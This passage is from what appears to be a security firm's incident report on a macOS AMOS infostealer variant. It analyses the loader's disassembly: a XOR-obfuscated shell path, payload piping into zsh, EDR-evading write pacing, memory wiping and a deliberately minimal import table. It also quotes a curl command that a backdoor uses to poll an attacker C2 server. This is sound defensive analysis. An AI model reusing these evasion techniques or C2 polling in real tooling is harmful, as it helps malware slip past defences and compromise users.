The 1-microsecond usleep between chunks serves a secondary purpose: it yields the CPU between writes, keeping the process's CPU utilisation flat and avoiding a sudden spike that a behavioural EDR rule might flag as anomalous burst I/O.

Step 4: Immediate memory wipe

; After all chunks written and pipe closed:
100000a20:  ldrb w8,[x19, #0x17]   ; check string storage type
100000a24:  sxtb w9,w8
100000a28:  ldp x10,x11,[x19]
100000a30:  csel x0,x10,x19,lt     ; pointer to payload buffer
100000a34:  csel x1,x11,x8,lt      ; length of buffer
100000a38:  bl 0x1000a0f30         ; _bzero(payload_buf, length)

The _bzero() call zeroes the entire decrypted payload buffer immediately after the last byte has been written to the pipe. There is no point in time, not even a microsecond, where the decrypted payload exists in memory after execution is complete. A live memory dump taken the instant after this function returns will find only zeroes where the payload was.

This is called zero-after-use and is the same technique used in high-assurance cryptographic libraries to prevent secret key material from persisting in memory. Seeing it in commodity malware is unusual and indicates a developer with a security engineering background.

The complete execution sequence:

__cstring:  "\x01LG@\x01T]F"   (8 bytes, obfuscated)
    ↓  SIMD XOR with 0x2e (8-wide vector)
stack:      "/bin/zsh\0"         (decoded in-place, stack only)
    ↓  _pipe() creates fd pair [read=local_60, write=local_5c]
    ↓  _fork()
    │
    ├─ CHILD:  _dup2(local_60, 0)   stdin = pipe read end
    │          _execvp("/bin/zsh", ["/bin/zsh", "-s", NULL])
    │          → /bin/zsh reads commands from stdin (= pipe)
    │
    └─ PARENT: loop: _write(local_5c, payload, variable_chunk)
                     _usleep(1)
               _close(local_5c)    close write end → EOF to shell
               _bzero(payload, len) ← WIPE IMMEDIATELY
               _waitpid(child, ...)

The Import Table as a Weapon

The complete import table of this binary is:

// C runtime / memory
_memcpy       _memmove      _memset       _bzero

// Process execution
_fork         _execvp       _execl        __exit

// IPC / pipes
_pipe         _dup2         _close        _write

// Synchronisation
_waitpid      _usleep

// Stack protection
___stack_chk_fail    ___stack_chk_guard

// C++ runtime
operator.new    operator.delete    __Unwind_Resume
___cxa_allocate_exception    ___cxa_throw    ___cxa_begin_catch
___cxa_end_catch    ___cxa_free_exception    ___gxx_personality_v0
terminate    logic_error    bad_array_new_length    __next_prime

// STL containers
append    reserve    push_back    operator=

// Dynamic linking
dyld_stub_binder

The total import count is 27 symbols. What is missing is as significant as what is present.

Absent — networking:

socket      connect     bind        listen
accept      send        recv        sendto
recvfrom    getaddrinfo gethostbyname

Absent — file system:

open        read        fopen       fread
fwrite      fclose      stat        unlink
mkdir       rename      opendir     readdir

Absent — process introspection:

getpid      getuid      getenv      sysctl

Absent — cryptography:

CCCrypt     SecItemAdd  SecKeychainFind

In a traditional malware sample, you expect to see imports for networking (socket, connect) or file manipulation (fopen, write). This binary has none. To a standard scanner, this binary looks like a harmless process launcher. This is a deliberate architectural choice to bypass static analysis tools that flag suspicious API usage.

The helper binary does not perform the theft itself. Its sole purpose is to drop and execute the real malicious payload: a heavily obfuscated AppleScript. A standalone EDR or AV looking for "malicious binaries" will see a loader with no network or file I/O capabilities and potentially grant it a "clean" verdict. It misses the fact that the binary is a specialized delivery system for a high-level script payload.


The Backdoor

The incident did not end after the initial compromise. Microsoft Defender telemetry showed a process running from /Users/<redacted>/.mainhelper, polling an external server:

sh -c "curl -s 'http[:]//45.94.47[.]204/api/tasks/*********************'"

The Base64 string decodes to a 16-byte device UUID, the unique identifier assigned to this machine by the attacker's C2 infrastructure on the day of the initial infection.

The .mainhelper binary (SHA-256: 7c6766e2b05dfbb286a1ba48ff3e766d4507254e217e8cb77343569153d63063) had been installed by the osascript dropper via ditto on the day of the incident.


The Power of the Collective Shield: Our Exclusive Shared Threat Intelligence Platform

When an alert fires in our SOC, the clock doesn't just start for the affected customer, it starts for every organization under the glueckkanja shield. This investigation into a previously undocumented AMOS variant highlights the critical nature of the intelligence gap: that dangerous window where traditional vendors are blind because they haven't seen the threat yet.

This is where our proprietary Shared Threat Intelligence Platform, developed exclusively for our glueckkanja CSOC customers, proves its decisive worth. We don't wait for industry updates; we create them. While our analysts were still dismantling the final layers of the ARM64 assembly, our Automated Orchestration Engine was already distributing the extracted indicators across our entire ecosystem. This creates an immediate herd immunity effect, where a discovery at a single endpoint becomes a blocked threat for every organization we protect within minutes.

Reactive security is a relic of the past when facing threats designed to slip through the cracks of conventional defenses. The answer lies in combining human expertise with an architecture that can deploy that knowledge instantly and at scale. When these insights are channeled through our shared intelligence model, the attacker's time advantage can be transformed into a liability, protecting our customers even before a threat is recognized by the wider industry.


Note on Data Privacy

Identifying information has been anonymised in this publication. Specific technical details, indicators, and timestamps may have been slightly altered to ensure the continued protection of the affected environment while maintaining the full technical integrity of the analysis.

The technical analysis and indicators of compromise (IOCs) provided in this report are for illustrative and educational purposes only. This information is provided on a "best effort" basis. glueckkanja AG makes no warranties, express or implied, regarding the completeness or accuracy of the data and shall not be held liable for any damages, losses, or security incidents resulting from the use or implementation of the information, rules, or signatures shared herein. Users are strongly advised to validate all indicators and rules in a controlled environment before deployment.

Indicators and techniques described may overlap with known malware families and are not exclusive to a single campaign.

Get in touch

Want to know how our Shared Threat Intelligence Platform protects you from unknown malware variants before the industry even knows they exist? Let's talk.
The dangerous thing about this variant wasn't the technical complexity, impressive as it is. The dangerous thing was the time window. Without Shared Threat Intelligence, our other customers would have been exposed for hours while we were still analyzing.
Jan Geisbauer, Head of Security
